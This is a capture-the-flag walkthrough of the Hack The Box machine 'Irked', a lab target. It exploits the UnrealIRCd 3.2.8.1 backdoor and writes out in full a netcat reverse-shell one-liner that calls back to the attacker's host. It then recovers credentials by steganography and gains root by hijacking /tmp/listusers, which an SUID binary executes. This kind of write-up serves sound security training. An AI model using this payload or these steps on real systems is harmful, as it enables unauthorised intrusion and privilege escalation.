Hack The Box - Irked Writeup

5 minute read

image1

Description:

Easy rated linux machine. Good box to learn some stego and also good for practicing privilege escalation for OSCP.

Enumeration

Add irked.htb to hosts and start an nmap scan.

Nmap

# Nmap 7.80 scan initiated Tue Sep  1 17:05:19 2020 as: nmap -sS -T4 -p- -vvvv -oN nmap.full irked.htb
Increasing send delay for 10.10.10.117 from 0 to 5 due to 320 out of 799 dropped probes since last increase.
Nmap scan report for irked.htb (10.10.10.117)
Host is up, received echo-reply ttl 63 (0.40s latency).
Scanned at 2020-09-01 17:05:19 IST for 876s
Not shown: 65528 closed ports
Reason: 65528 resets
PORT      STATE SERVICE    REASON
22/tcp    open  ssh        syn-ack ttl 63
80/tcp    open  http       syn-ack ttl 63
111/tcp   open  rpcbind    syn-ack ttl 63
6697/tcp  open  ircs-u     syn-ack ttl 63
8067/tcp  open  infi-async syn-ack ttl 63
48842/tcp open  unknown    syn-ack ttl 63
65534/tcp open  unknown    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
# Nmap done at Tue Sep  1 17:19:55 2020 -- 1 IP address (1 host up) scanned in 875.58 seconds

Ports 80 and 6697 looks interesting.

image1

Investigating port 80 does not reveal much. There is just an image in the index page. No other interesting files or directories could be found.

IRC port 6697

Moving on to port 6697, connecting using nc gives a banner.

kali@kali:~/Desktop/htb/irked$ nc irked.htb 6697
:irked.htb NOTICE AUTH :*** Looking up your hostname...

We can try out a nmap scan on the port.

# Nmap 7.80 scan initiated Mon Aug 31 21:11:32 2020 as: nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 -oN irc_nmap irked.htb
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.28s latency).
Not shown: 341 closed ports
PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
| irc-botnet-channels: 
|_  ERROR: Closing Link: [10.10.14.21] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 31 21:11:43 2020 -- 1 IP address (1 host up) scanned in 11.61 seconds

We can see that the scan has identified the irc server as unrealIRCd.

Searchsploit

ERROR :Closing Link: [10.10.14.21] (Ping timeout)
kali@kali:~/Desktop/htb/irked$ searchsploit unrealirc
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                       | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                            | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                     | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                          | windows/dos/27407.pl
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

And we have some RCE exploits.

Low Shell

Reading up the exploit shows that there is a backdoor in the software that is triggered when we enter the keyword AB;. Run a reverse shell payload to get shell.

kali@kali:~/Desktop/htb/irked$ nc irked.htb 6697
:irked.htb NOTICE AUTH :*** Looking up your hostname...
AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.21 443 >/tmp/f
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

On the listener, we get a connection.

kali@kali:~/Desktop/htb/irked$ sudo nc -lvp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [10.10.14.21] from irked.htb [10.10.10.117] 54581
bash: cannot set terminal process group (641): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

We have a shell as user ircd.

User Shell

We have a limited shell right now. Looking through the directories of user djmardov, we can see a backup file.

ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

There is a hint that this is somehow related to stegnography. We can try analyzing the image on the front page using steghide to see if we can uncover something.

kali@kali:~/Desktop/htb/irked$ wget http://irked.htb/irked.jpg
--2020-09-01 17:22:06--  http://irked.htb/irked.jpg
Resolving irked.htb (irked.htb)... 10.10.10.117
Connecting to irked.htb (irked.htb)|10.10.10.117|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’

irked.jpg                   100%[==============================================>]  33.88K  4.52KB/s    in 7.5s

2020-09-01 17:22:14 (4.52 KB/s) - ‘irked.jpg’ saved [34697/34697]


kali@kali:~/Desktop/htb/irked$ steghide --extract --stegofile ./irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
kali@kali:~/Desktop/htb/irked$ cat pass.txt
Kab6h+m+bbp2J:HG

We can try sshing into the box using this password.

kali@kali:~/Desktop/htb/irked$ ssh djmardov@irked.htb
djmardov@irked.htb's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Sep  1 07:33:13 2020 from 10.10.14.21
djmardov@irked:~$ id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:~$

Root Shell

Looking at files with suid bit, we can see an unusual binary name viewuser

djmardov@irked:~$ find / -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
djmardov@irked:~$

We can run the binary with pspy running in the background to understand what it does.

PSPY Analysis

djmardov@irked:/tmp$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-09-01 04:34 (:0)
djmardov pts/0        2020-09-01 07:57 (10.10.14.21)
sh: 1: /tmp/listusers: not found

The binary throws an error stating that the file /tmp/listusers does not exist.

2020/09/01 00:30:26 CMD: UID=0    PID=1      | /sbin/init
2020/09/01 00:30:34 CMD: UID=1000 PID=2048   | -bash
2020/09/01 00:30:34 CMD: UID=1000 PID=2049   | sh -c who
2020/09/01 00:30:34 CMD: UID=1000 PID=2050   | sh -c who
2020/09/01 00:30:34 CMD: UID=1000 PID=2053   | sh -c /tmp/listusers
2020/09/01 00:30:34 CMD: UID=1000 PID=2052   | sh -c /tmp/listusers
2020/09/01 00:30:41 CMD: UID=1000 PID=2054   | -bash
2020/09/01 00:30:41 CMD: UID=1000 PID=2055   | sh -c who
2020/09/01 00:30:41 CMD: UID=1000 PID=2056   | sh -c who
2020/09/01 00:30:41 CMD: UID=1000 PID=2057   | sh -c /tmp/listusers
2020/09/01 00:30:41 CMD: UID=1000 PID=2058   | sh -c /tmp/listusers
2020/09/01 00:32:06 CMD: UID=1000 PID=2059   | -bash
2020/09/01 00:32:06 CMD: UID=1000 PID=2060   | sh -c who
2020/09/01 00:32:06 CMD: UID=1000 PID=2061   | sh -c who
2020/09/01 00:32:06 CMD: UID=1000 PID=2062   | viewuser
2020/09/01 00:32:06 CMD: UID=1000 PID=2063   | sh -c /tmp/listusers
2020/09/01 00:32:21 CMD: UID=0    PID=2064   |

pspy shows that the binary is executing the contents of /tmp/listusers

Lets echo /bin/sh to /tmp/listusers and run viewusers.

djmardov@irked:/tmp$ echo "/bin/sh" > /tmp/listusers
djmardov@irked:/tmp$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-09-01 04:34 (:0)
djmardov pts/0        2020-09-01 07:57 (10.10.14.21)
sh: 1: /tmp/listusers: Permission denied
djmardov@irked:/tmp$ chmod 777 listusers
djmardov@irked:/tmp$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-09-01 04:34 (:0)
djmardov pts/0        2020-09-01 07:57 (10.10.14.21)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
#

And we are root.

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.